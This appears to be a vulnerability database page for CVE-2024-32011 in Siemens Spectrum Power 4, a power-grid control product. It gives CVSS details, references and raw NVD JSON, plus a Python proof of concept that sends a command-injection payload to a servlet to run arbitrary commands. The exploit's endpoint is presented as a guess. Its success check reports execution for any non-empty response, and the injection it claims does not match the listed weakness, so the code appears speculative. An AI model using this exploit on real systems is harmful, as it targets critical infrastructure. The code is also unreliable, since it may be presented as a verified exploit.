CVE-2024-32011

Description

A vulnerability has been identified in Spectrum Power 4 (All versions < V4.70 SP12 Update 2). The affected application is vulnerable to run arbitrary commands via the user interface. This user interface can be used via the network and allows the execution of commands as administrative application user.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Spectrum Power 4 < V4.70 SP12 Update 2 (所有更早版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2024-32011 PoC - Siemens Spectrum Power 4 RCE
# Target: Siemens Spectrum Power 4 < V4.70 SP12 Update 2

import requests
import sys

def exploit_spectrum_power(target_url, command):
    """
    Exploit for CVE-2024-32011 - Command Injection in Spectrum Power 4 UI
    """
    # Target endpoint (typical Spectrum Power web interface)
    endpoint = f"{target_url}/spectrum/servlet/CommandServlet"
    
    # Malicious payload with command injection
    payload = {
        'action': 'diagnostics',
        'cmd': f'echo;{command}',  # Command injection point
        'model': 'TestModel'
    }
    
    try:
        print(f"[*] Sending exploit payload to {target_url}")
        print(f"[*] Command: {command}")
        
        response = requests.post(endpoint, data=payload, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[*] Response length: {len(response.text)} bytes")
            # Check for command output in response
            if command in response.text or response.text:
                print(f"[+] Potential command execution detected")
                return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
    
    return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <command>")
        print(f"Example: {sys.argv[0]} https://spectrum-power.local 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    exploit_spectrum_power(target, cmd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-32011
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-32011
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-32011/
[4] VulDB https://vuldb.com/cve/CVE-2024-32011
[5] https://cert-portal.siemens.com/productcert/html/ssa-339694.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-32011", "sourceIdentifier": "[email protected]", "published": "2025-11-11T21:15:35.623", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Spectrum Power 4 (All versions < V4.70 SP12 Update 2). The affected application is vulnerable to run arbitrary commands via the user interface. This user interface can be used via the network and allows the execution of commands as administrative application user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-339694.html", "source": "[email protected]"}]}}